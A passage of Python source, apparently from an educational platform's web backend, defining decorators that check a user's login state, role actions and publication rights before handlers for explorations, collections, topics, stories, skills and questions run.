"""Checks if the user can make suggestions to an exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
give suggestions to an exploration.
"""
if role_services.ACTION_SUGGEST_CHANGES in self.user.actions:
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to give suggestions to this '
'exploration.')
test_can_suggest.__wrapped__ = True
return test_can_suggest
def can_suggest_changes(handler):
"""Decorator to check whether a user can make suggestions.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to make suggestions.
"""
def test_can_suggest(self, **kwargs):
"""Checks if the user can make suggestions to an exploration.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
make suggestions.
"""
if role_services.ACTION_SUGGEST_CHANGES in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to make suggestions.')
test_can_suggest.__wrapped__ = True
return test_can_suggest
def can_resubmit_suggestion(handler):
"""Decorator to check whether a user can resubmit a suggestion."""
def test_can_resubmit_suggestion(self, suggestion_id, **kwargs):
"""Checks if the user can edit the given suggestion.
Args:
suggestion_id: str. The ID of the suggestion.
**kwargs: *. The keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
edit this suggestion.
"""
suggestion = suggestion_services.get_suggestion_by_id(suggestion_id)
if not suggestion:
raise self.InvalidInputException(
'No suggestion found with given suggestion id')
if suggestion_services.check_can_resubmit_suggestion(
suggestion_id, self.user_id):
return handler(self, suggestion_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to resubmit this suggestion.')
test_can_resubmit_suggestion.__wrapped__ = True
return test_can_resubmit_suggestion
def can_publish_exploration(handler):
"""Decorator to check whether user can publish exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to publish an exploration.
"""
def test_can_publish(self, exploration_id, *args, **kwargs):
"""Checks if the user can publish the exploration.
Args:
exploration_id: str. The exploration id.
*args: list(*). A list of arguments.
**kwargs: *. Keyword arguments present in kwargs.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
publish an exploration.
"""
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_publish_activity(
self.user, exploration_rights):
return handler(self, exploration_id, *args, **kwargs)
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to publish this exploration.')
test_can_publish.__wrapped__ = True
return test_can_publish
def can_publish_collection(handler):
"""Decorator to check whether user can publish collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to publish a collection.
"""
def test_can_publish_collection(self, collection_id, **kwargs):
"""Checks if the user can publish the collection.
Args:
collection_id: str. The collection id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
publish a collection.
"""
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
if collection_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_publish_activity(
self.user, collection_rights):
return handler(self, collection_id, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to publish this collection.')
test_can_publish_collection.__wrapped__ = True
return test_can_publish_collection
def can_unpublish_collection(handler):
"""Decorator to check whether user can unpublish a given
collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that also checks if
the user has permission to unpublish a collection.
"""
def test_can_unpublish_collection(self, collection_id, **kwargs):
"""Checks if the user can unpublish the collection.
Args:
collection_id: str. The collection id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials
to unpublish a collection.
"""
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
if collection_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_unpublish_activity(
self.user, collection_rights):
return handler(self, collection_id, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to unpublish this collection.')
test_can_unpublish_collection.__wrapped__ = True
return test_can_unpublish_collection
def can_modify_exploration_roles(handler):
"""Decorators to check whether user can manage rights related to an
exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
the user has permission to manage rights related to an
exploration.
"""
def test_can_modify(self, exploration_id, **kwargs):
"""Checks if the user can modify the rights related to an exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
change the rights for an exploration.
"""
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_modify_activity_roles(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to change rights for this '
'exploration.')
test_can_modify.__wrapped__ = True
return test_can_modify
def can_perform_cron_tasks(handler):
"""Decorator to ensure that the handler is being called by cron or by a
superadmin of the application.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also ensures that
the handler can only be executed if it is called by cron or by
a superadmin of the application.
"""
def test_can_perform(self, **kwargs):
"""Checks if the handler is called by cron or by a superadmin of the
application.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have
credentials to access the page.
"""
if (self.request.headers.get('X-AppEngine-Cron') is None and
not self.current_user_is_super_admin):
raise self.UnauthorizedUserException(
'You do not have the credentials to access this page.')
else:
return handler(self, **kwargs)
test_can_perform.__wrapped__ = True
return test_can_perform
def can_access_learner_dashboard(handler):
"""Decorator to check access to learner dashboard.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
one can access the learner dashboard.
"""
def test_can_access(self, **kwargs):
"""Checks if the user can access the learner dashboard.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
"""
if role_services.ACTION_ACCESS_LEARNER_DASHBOARD in self.user.actions:
return handler(self, **kwargs)
else:
raise self.NotLoggedInException
test_can_access.__wrapped__ = True
return test_can_access
def can_manage_question_skill_status(handler):
"""Decorator to check whether the user can publish a question and link it
to a skill.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the
given user has permission to publish a question and link it
to a skill.
"""
def test_can_manage_question_skill_status(self, **kwargs):
"""Checks if the user can publish a question directly.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
credentials to publish a question.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if (
role_services.ACTION_MANAGE_QUESTION_SKILL_STATUS in
self.user.actions):
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to publish a question.')
test_can_manage_question_skill_status.__wrapped__ = True
return test_can_manage_question_skill_status
def require_user_id_else_redirect_to_homepage(handler):
"""Decorator that checks if a user_id is associated with the current
session. If not, the user is redirected to the main page.
Note that the user may not yet have registered.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if a given user_id is associated with the current
session.
"""
def test_login(self, **kwargs):
"""Checks if the user for the current session is logged in.
If not, redirects the user to the home page.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
"""
if not self.user_id:
self.redirect('/')
return
return handler(self, **kwargs)
test_login.__wrapped__ = True
return test_login
def can_edit_topic(handler):
"""Decorator to check whether the user can edit given topic."""
def test_can_edit(self, topic_id, *args, **kwargs):
"""Checks whether the user can edit a given topic.
Args:
topic_id: str. The topic id.
*args: list(*). The arguments from the calling function.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to edit a topic.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None or topic is None:
raise base.UserFacingExceptions.PageNotFoundException
if topic_services.check_can_edit_topic(self.user, topic_rights):
return handler(self, topic_id, *args, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to edit this topic.')
test_can_edit.__wrapped__ = True
return test_can_edit
def can_edit_question(handler):
"""Decorator to check whether the user can edit given question.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
whether the user has permission to edit a given question.
"""
def test_can_edit(self, question_id, **kwargs):
"""Checks whether the user can edit the given question.
Args:
question_id: str. The question id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to edit a question.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
question = question_services.get_question_by_id(
question_id, strict=False)
if question is None:
raise self.PageNotFoundException
if role_services.ACTION_EDIT_ANY_QUESTION in self.user.actions:
return handler(self, question_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to edit this question.')
test_can_edit.__wrapped__ = True
return test_can_edit
def can_play_question(handler):
"""Decorator to check whether the user can play given question.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
whether the user can play a given question.
"""
def test_can_play_question(self, question_id, **kwargs):
"""Checks whether the user can play the given question.
Args:
question_id: str. The question id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
question = question_services.get_question_by_id(
question_id, strict=False)
if question is None:
raise self.PageNotFoundException
return handler(self, question_id, **kwargs)
test_can_play_question.__wrapped__ = True
return test_can_play_question
def can_view_question_editor(handler):
"""Decorator to check whether the user can view any question editor.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if the user has permission to view any question editor.
"""
def test_can_view_question_editor(self, question_id, **kwargs):
"""Checks whether the user can view the question editor.
Args:
question_id: str. The question id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
enough rights to access the question editor.
"""
if not self.user_id:
raise self.NotLoggedInException
question = question_services.get_question_by_id(
question_id, strict=False)
if question is None:
raise self.PageNotFoundException
if role_services.ACTION_VISIT_ANY_QUESTION_EDITOR in self.user.actions:
return handler(self, question_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to access the questions editor'
% self.user_id)
test_can_view_question_editor.__wrapped__ = True
return test_can_view_question_editor
def can_delete_question(handler):
"""Decorator to check whether the user can delete a question.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if the user has permission to delete a question.
"""
def test_can_delete_question(self, question_id, **kwargs):
"""Checks whether the user can delete a given question.
Args:
question_id: str. The question id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to delete the question.
"""
if not self.user_id:
raise self.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (role_services.ACTION_DELETE_ANY_QUESTION in
user_actions_info.actions):
return handler(self, question_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to delete the'
' question.' % self.user_id)
test_can_delete_question.__wrapped__ = True
return test_can_delete_question
def can_add_new_story_to_topic(handler):
"""Decorator to check whether the user can add a story to a given topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if the user has permission to add a story to a given topic.
"""
def test_can_add_story(self, topic_id, **kwargs):
"""Checks whether the user can add a story to
a given topic.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to add a story to a given topic.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None or topic is None:
raise base.UserFacingExceptions.PageNotFoundException
if topic_services.check_can_edit_topic(self.user, topic_rights):
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to add a story to this topic.')
test_can_add_story.__wrapped__ = True
return test_can_add_story
def can_edit_story(handler):
"""Decorator to check whether the user can edit a story belonging to a given
topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
a user has permission to edit a story for a given topic.
"""
def test_can_edit_story(self, story_id, **kwargs):
"""Checks whether the user can edit a story belonging to
a given topic.
Args:
story_id: str. The story id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to edit a story belonging to a
given topic.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
story_domain.Story.require_valid_story_id(story_id)
story = story_fetchers.get_story_by_id(story_id, strict=False)
if story is None:
raise base.UserFacingExceptions.PageNotFoundException
topic_id = story.corresponding_topic_id
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
if topic_rights is None or topic is None:
raise base.UserFacingExceptions.PageNotFoundException
canonical_story_ids = topic.get_canonical_story_ids()
if story_id not in canonical_story_ids:
raise base.UserFacingExceptions.PageNotFoundException
if topic_services.check_can_edit_topic(self.user, topic_rights):
return handler(self, story_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to edit this story.')
test_can_edit_story.__wrapped__ = True
return test_can_edit_story
def can_edit_skill(handler):
"""Decorator to check whether the user can edit a skill, which can be
independent or belong to a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
the user has permission to edit a skill.
"""
def test_can_edit_skill(self, skill_id, **kwargs):
"""Test to see if user can edit a given skill by checking if
logged in and using can_user_edit_skill.
Args:
skill_id: str. The skill ID.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The given page cannot be found.
UnauthorizedUserException. The user does not have the
credentials to edit the given skill.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if role_services.ACTION_EDIT_SKILLS in self.user.actions:
return handler(self, skill_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to edit this skill.')
test_can_edit_skill.__wrapped__ = True
return test_can_edit_skill
def can_delete_skill(handler):
"""Decorator to check whether the user can delete a skill.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
if the user can delete a skill.
"""
def test_can_delete_skill(self, **kwargs):
"""Checks whether the user can delete a skill.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
credentials to delete a skill.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if role_services.ACTION_DELETE_ANY_SKILL in user_actions_info.actions:
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to delete the skill.')
test_can_delete_skill.__wrapped__ = True
return test_can_delete_skill
def can_create_skill(handler):
"""Decorator to check whether the user can create a skill, which can be
independent or added to a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
the user has permission to create a skill.
"""
def test_can_create_skill(self, **kwargs):
"""Checks whether the user can create a skill, which can be
independent or belong to a topic.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
credentials to create a skill.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if role_services.ACTION_CREATE_NEW_SKILL in user_actions_info.actions:
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to create a skill.')
test_can_create_skill.__wrapped__ = True
return test_can_create_skill
def can_delete_story(handler):
"""Decorator to check whether the user can delete a story in a given
topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks
whether the user has permission to delete a story in a
given topic.
"""
def test_can_delete_story(self, story_id, **kwargs):
"""Checks whether the user can delete a story in
a given topic.
Args:
story_id: str. The story ID.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to delete a story.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
story = story_fetchers.get_story_by_id(story_id, strict=False)
if story is None:
raise base.UserFacingExceptions.PageNotFoundException
topic_id = story.corresponding_topic_id
topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None or topic is None:
raise base.UserFacingExceptions.PageNotFoundException
if topic_services.check_can_edit_topic(self.user, topic_rights):
return handler(self, story_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to delete this story.')
test_can_delete_story.__wrapped__ = True
return test_can_delete_story
def can_delete_topic(handler):
"""Decorator to check whether the user can delete a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also
checks if the user can delete a given topic.
"""
def test_can_delete_topic(self, topic_id, **kwargs):
"""Checks whether the user can delete a given topic.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to delete a given topic.
"""
if not self.user_id:
raise self.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
user_actions_info = user_services.get_user_actions_info(self.user_id)
if role_services.ACTION_DELETE_TOPIC in user_actions_info.actions:
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to delete the'
' topic.' % self.user_id)
test_can_delete_topic.__wrapped__ = True
return test_can_delete_topic
def can_create_topic(handler):
"""Decorator to check whether the user can create a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that also checks
if the user can create a topic.
"""
def test_can_create_topic(self, **kwargs):
"""Checks whether the user can create a topic.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to create a topic.
"""
if not self.user_id:
raise self.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if role_services.ACTION_CREATE_NEW_TOPIC in user_actions_info.actions:
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to create a'
' topic.' % self.user_id)
test_can_create_topic.__wrapped__ = True
return test_can_create_topic
def can_access_topics_and_skills_dashboard(handler):
"""Decorator to check whether the user can access the topics and skills
dashboard.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that also checks if
the user can access the topics and skills dashboard.
"""
def test_can_access_topics_and_skills_dashboard(self, **kwargs):
"""Checks whether the user can access the topics and skills
dashboard.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to access the topics and skills
dashboard.
"""
if not self.user_id:
raise self.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
role_services.ACTION_ACCESS_TOPICS_AND_SKILLS_DASHBOARD in
user_actions_info.actions):
return handler(self, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to access the topics and skills'
' dashboard.' % self.user_id)
test_can_access_topics_and_skills_dashboard.__wrapped__ = True
return test_can_access_topics_and_skills_dashboard
def can_view_any_topic_editor(handler):
"""Decorator to check whether the user can view any topic editor.
Args:
handler: function. The newly decorated function.
Returns:
function. The newly decorated function that also checks
if the user can view any topic editor.
"""
def test_can_view_any_topic_editor(self, topic_id, **kwargs):
"""Checks whether the user can view any topic editor.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to view any topic editor.
"""
if not self.user_id:
raise self.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
role_services.ACTION_VISIT_ANY_TOPIC_EDITOR in
user_actions_info.actions):
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to view any topic editor.'
% self.user_id)
test_can_view_any_topic_editor.__wrapped__ = True
return test_can_view_any_topic_editor
def can_manage_rights_for_topic(handler):
"""Decorator to check whether the user can manage a topic's rights.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that also checks
if the user can manage a given topic's rights.
"""
def test_can_manage_topic_rights(self, topic_id, **kwargs):
"""Checks whether the user can manage a topic's rights.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to assign roles for a given topic.
"""
if not self.user_id:
raise self.NotLoggedInException
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
role_services.ACTION_MANAGE_TOPIC_RIGHTS in
user_actions_info.actions):
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to assign roles for the '
'topic.' % self.user_id)
test_can_manage_topic_rights.__wrapped__ = True
return test_can_manage_topic_rights
def can_change_topic_publication_status(handler):
"""Decorator to check whether the user can publish or unpublish a topic.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can publish or unpublish a topic.
"""
def test_can_change_topic_publication_status(self, topic_id, **kwargs):
"""Checks whether the user can can publish or unpublish a topic.
Args:
topic_id: str. The topic id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have
enough rights to publish or unpublish the topic..
"""
if not self.user_id:
raise self.NotLoggedInException
try:
topic_domain.Topic.require_valid_topic_id(topic_id)
except utils.ValidationError as e:
raise self.PageNotFoundException(e)
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
role_services.ACTION_CHANGE_TOPIC_STATUS in
user_actions_info.actions):
return handler(self, topic_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'%s does not have enough rights to publish or unpublish the '
'topic.' % self.user_id)
test_can_change_topic_publication_status.__wrapped__ = True
return test_can_change_topic_publication_status
def can_access_topic_viewer_page(handler):
"""Decorator to check whether user can access topic viewer page.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can access the given topic viewer page.
"""
def test_can_access(
self, classroom_url_fragment, topic_url_fragment, **kwargs):
"""Checks if the user can access topic viewer page.
Args:
topic_url_fragment: str. The url fragment of the topic.
classroom_url_fragment: str. The classroom url fragment.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The given page cannot be found.
"""
if topic_url_fragment != topic_url_fragment.lower():
_redirect_based_on_return_type(
self, '/learn/%s/%s' % (
classroom_url_fragment,
topic_url_fragment.lower()),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
topic = topic_fetchers.get_topic_by_url_fragment(
topic_url_fragment)
if topic is None:
_redirect_based_on_return_type(
self, '/learn/%s' % classroom_url_fragment,
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
verified_classroom_url_fragment = (
classroom_services.get_classroom_url_fragment_for_topic_id(
topic.id))
if classroom_url_fragment != verified_classroom_url_fragment:
url_substring = topic_url_fragment
_redirect_based_on_return_type(
self, '/learn/%s/%s' % (
verified_classroom_url_fragment,
url_substring),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
topic_id = topic.id
topic_rights = topic_fetchers.get_topic_rights(
topic_id, strict=False)
user_actions_info = user_services.get_user_actions_info(self.user_id)
if (
topic_rights.topic_is_published or
role_services.ACTION_VISIT_ANY_TOPIC_EDITOR in
user_actions_info.actions):
return handler(self, topic.name, **kwargs)
else:
raise self.PageNotFoundException
test_can_access.__wrapped__ = True
return test_can_access
def can_access_story_viewer_page(handler):
"""Decorator to check whether user can access story viewer page.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can access the given story viewer page.
"""
def test_can_access(
self, classroom_url_fragment, topic_url_fragment,
story_url_fragment, *args, **kwargs):
"""Checks if the user can access story viewer page.
Args:
classroom_url_fragment: str. The classroom url fragment.
topic_url_fragment: str. The url fragment of the topic
associated with the story.
story_url_fragment: str. The story url fragment.
*args: list(*). A list of arguments from the calling function.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The given page cannot be found.
"""
if story_url_fragment != story_url_fragment.lower():
_redirect_based_on_return_type(
self, '/learn/%s/%s/story/%s' % (
classroom_url_fragment,
topic_url_fragment,
story_url_fragment.lower()),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
story = story_fetchers.get_story_by_url_fragment(story_url_fragment)
if story is None:
_redirect_based_on_return_type(
self,
'/learn/%s/%s/story' %
(classroom_url_fragment, topic_url_fragment),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
story_is_published = False
topic_is_published = False
topic_id = story.corresponding_topic_id
story_id = story.id
user_actions_info = user_services.get_user_actions_info(self.user_id)
if topic_id:
topic = topic_fetchers.get_topic_by_id(topic_id)
if topic.url_fragment != topic_url_fragment:
_redirect_based_on_return_type(
self,
'/learn/%s/%s/story/%s' % (
classroom_url_fragment,
topic.url_fragment,
story_url_fragment),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
verified_classroom_url_fragment = (
classroom_services.get_classroom_url_fragment_for_topic_id(
topic.id))
if classroom_url_fragment != verified_classroom_url_fragment:
url_substring = '%s/story/%s' % (
topic_url_fragment, story_url_fragment)
_redirect_based_on_return_type(
self, '/learn/%s/%s' % (
verified_classroom_url_fragment,
url_substring),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
topic_rights = topic_fetchers.get_topic_rights(topic_id)
topic_is_published = topic_rights.topic_is_published
all_story_references = topic.get_all_story_references()
for reference in all_story_references:
if reference.story_id == story_id:
story_is_published = reference.story_is_published
if (
(story_is_published and topic_is_published) or
role_services.ACTION_VISIT_ANY_TOPIC_EDITOR in
user_actions_info.actions):
return handler(self, story_id, *args, **kwargs)
else:
raise self.PageNotFoundException
test_can_access.__wrapped__ = True
return test_can_access
def can_access_subtopic_viewer_page(handler):
"""Decorator to check whether user can access subtopic page viewer.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks
if the user can access the given subtopic viewer page.
"""
def test_can_access(
self, classroom_url_fragment, topic_url_fragment,
subtopic_url_fragment, **kwargs):
"""Checks if the user can access subtopic viewer page.
Args:
classroom_url_fragment: str. The classroom url fragment.
topic_url_fragment: str. The url fragment of the topic
associated with the subtopic.
subtopic_url_fragment: str. The url fragment of the Subtopic.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of decorated function.
Raises:
PageNotFoundException. The given page cannot be found.
"""
if subtopic_url_fragment != subtopic_url_fragment.lower():
_redirect_based_on_return_type(
self, '/learn/%s/%s/revision/%s' % (
classroom_url_fragment,
topic_url_fragment,
subtopic_url_fragment.lower()),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
topic = topic_fetchers.get_topic_by_url_fragment(topic_url_fragment)
subtopic_id = None
if topic is None:
_redirect_based_on_return_type(
self, '/learn/%s' % classroom_url_fragment,
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
user_actions_info = user_services.get_user_actions_info(self.user_id)
topic_rights = topic_fetchers.get_topic_rights(topic.id)
if (
(topic_rights is None or not topic_rights.topic_is_published)
and role_services.ACTION_VISIT_ANY_TOPIC_EDITOR not in
user_actions_info.actions):
_redirect_based_on_return_type(
self, '/learn/%s' % classroom_url_fragment,
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
for subtopic in topic.subtopics:
if subtopic.url_fragment == subtopic_url_fragment:
subtopic_id = subtopic.id
if not subtopic_id:
_redirect_based_on_return_type(
self,
'/learn/%s/%s/revision' %
(classroom_url_fragment, topic_url_fragment),
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
verified_classroom_url_fragment = (
classroom_services.get_classroom_url_fragment_for_topic_id(
topic.id))
if classroom_url_fragment != verified_classroom_url_fragment:
url_substring = '%s/revision/%s' % (
topic_url_fragment, subtopic_url_fragment)
_redirect_based_on_return_type(
self, '/learn/%s/%s' % (
verified_classroom_url_fragment,
url_substring),
